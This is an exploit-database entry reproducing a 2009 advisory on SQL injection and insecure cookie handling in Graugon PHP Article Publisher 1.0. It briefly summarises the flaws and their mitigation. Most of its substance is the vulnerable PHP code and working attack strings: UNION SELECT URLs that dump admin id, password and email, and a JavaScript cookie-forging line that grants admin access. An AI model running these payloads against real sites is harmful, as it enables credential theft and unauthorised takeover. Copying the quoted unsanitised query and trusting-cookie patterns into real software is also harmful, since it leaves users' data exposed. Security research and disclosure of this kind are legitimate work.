header-logo
Suggest Exploit
vendor:
Graugon PHP Article Publisher
by:
x0r
7.5
CVSS
HIGH
Multiple Sql Injections / Insecure Cookie Handling
89, 614
CWE
Product Name: Graugon PHP Article Publisher
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:graugon:graugon_php_article_publisher
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Graugon PHP Article Publisher 1.0

The Graugon PHP Article Publisher 1.0 is vulnerable to multiple SQL injections and insecure cookie handling. An attacker can exploit these vulnerabilities to gain access to sensitive information such as user credentials and other details stored in the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Also, ensure that cookies are properly secured.
Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Name           : Graugon PHP Article Publisher 1.0
Download       : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability  : Multiple Sql Injections / Insecure Cookie Handling
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged Page: index.php [..] admin.php [..] view.php

[Code]
$c = $_GET['c'];

$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]

[code]
 
$TwoMonths = 60 * 60 * 24 * 60 + time(); 
setcookie(g_admin, 1, $TwoMonths);

[/code]

[code]

$id = $_GET['id']; [..]

$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]

#########################################################################################
[0x03] Exploits:

Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
          http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
          javascript:document.cookie ="g_admin=1; path=/"

########################################################################################


# milw0rm.com [2009-03-02]